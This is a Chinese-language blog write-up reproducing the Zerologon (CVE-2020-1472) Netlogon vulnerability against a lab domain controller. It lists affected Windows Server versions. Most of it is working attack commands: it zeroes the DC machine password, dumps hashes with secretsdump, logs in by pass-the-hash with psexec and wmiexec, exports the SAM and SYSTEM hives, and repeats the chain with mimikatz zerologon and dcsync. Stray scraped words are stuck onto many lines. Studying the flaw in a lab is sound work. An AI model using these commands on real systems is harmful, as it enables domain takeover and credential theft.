cve-2020-1472,netlogon特權提高漏洞復現

cve-2020-1472,netlogon特權提高漏洞,php

漏洞原理:攻擊者經過NetLogon(MS-NRPC),創建與域控間易受攻擊的安全通道時,可利用此漏洞獲取域管訪問權限。成功利用此漏洞的攻擊者能夠在該網絡中的設備上運行經特殊設計的應用程序。python

影響版本號:git

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2012

Windows Server 2012 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 R2 (Server Core installation)

Windows Server 2016

Windows Server 2016 (Server Core installation)

Windows Server 2019

Windows Server 2019 (Server Core installation)

Windows Server, version 1903 (Server Core installation)

Windows Server, version 1909 (Server Core installation)

Windows Server, version 2004 (Server Core installation)
使用工具 zerologon_teste
pip3 install -r requirements
安裝requirements的依賴環境

安裝最新的impacket方法:github

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
virtualenv  --python=python3 impacket 
source impacket/bin/activate
pip3 install .

python3 -m pip install .

step1:探測目標機是否存在cve-2020-1472安全

python3 zerologon_tester.py 域控主機名  域控IP  
python3 zerologon_tester.py  win08  192.168.223.133

BphpYq.png

step2: 將目標機中域控win08$的密碼清空網絡

python3  cve-2020-1472-exploit.py  域控主機名  域控IP  
python3  cve-2020-1472-exploit.py  win08  192.168.223.133

Bp5FZ4.png

step3:使用impacket下的secretdump.py去獲取域控的HASHdom

secretsdump.py test.com/win08\$@192.168.223.133 -no-pass

Bp5uQK.png

使用PTH登陸域控;工具

psexec.py test.com/administrator@192.168.223.133  -hashes :獲取的administrator中hash值

wmiexec.py test.com/administrator@192.168.223.133 -hashes :獲取的administrator中hash值
wmiexec.py test.com/administrator@192.168.223.133 -hashes  :afffeba176210fad4628f0524bfe1942

Bp5v0e.png

執行系統命令post

reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
注:上述產生的文件是存在目標機中,須要導出到攻擊機中;
get sam.hive
get system.hive
get security.hive

BpIgNd.png

使用mimikatz或者secretsdumo.py讀取文件測試

secretsdump.py -sam sam.hive -system system.hive -security security.hive LOCAL

step4:恢復域控的密碼

python3 reinstall_original_pw.py  win08 192.168.223.133 79e0831681fc703c76295202fac36b0570a0d536a302ecc37341df6018b2918941743a443f9c19f26edc57c7b0dfa4f26c83419552bd45e5f110622582f27f649dd4a63be6e93d106f68b2d03043b4e24f076177084534594750ac8fc054bf3118f4bd73ac506cafb051d60d6fcff4852474ceebba12726551d81031e84e06d21380b96f1b0ad6d9736854af6fe20719aa70342ac77f75099521854ad02cac1901b87300172f03b1e185de535ebc22a568fd38c9ab53bd4fa3d621126af124e5eb1c7d74470add983f16420ca005156442bde6e08a4312fe510712911f408efde41dbd9ea8e2c0281872362250a07d2c

Bp7F6x.png
恢復密碼效果測試,若是能夠登陸則證實沒有成功寫入密碼:

python3 secretdump.py  test.com/win08\$@192.168.223.133  -no-pass

BSL0AS.png

使用mimikatz.exe去攻擊域控

檢測目標機是否存在cve2020-1472

lsadump::zerologon  /target:域控IP  /account:域控主機名$
lsadump::zerologon  /target:192.168.223.133 /account:win08$

BSx3QJ.md.png

清空域控密碼

lsadump::zerologon  /target:域控IP  /account:域控主機名$  /exploit
lsadump::zerologon /target:192.168.223.133 /account:win08$ /exploit

BppeeA.md.png

獲取目標機的HASH

lsadump::dcsync /domain:de1ay.com /dc:dc.de1ay.com /user:krbtgt /authuser:dc$ /authdomain:de1ay.com /authpassword:"" /authntlm
注意:本地測試須要將DNS指向域控

lsadump::dcsync /domain:test.com /win08:win08.test.com /user:administrator /authuser:win08$ /authdomain:test.com /authpassword:"" /authntlm

Bp9SXQ.md.png

恢復密碼

lsadump::postzerologon /target:dc.de1ay.com /account:dc$
lsadump::postzerologon /target:192.168.223.133 /account:win08$

BpMxIK.md.png

注:mimikatz在讀取域內HASH的時候須要配置DNS 指向域控 /dc: win08.test.com 這裏填寫域控的完整的名字 ; 輸入參數都正確的狀況還獲取不了, 重啓AD服務 在恢復密碼的時候注意先去運行privilege::debug

相關文章
相關標籤/搜索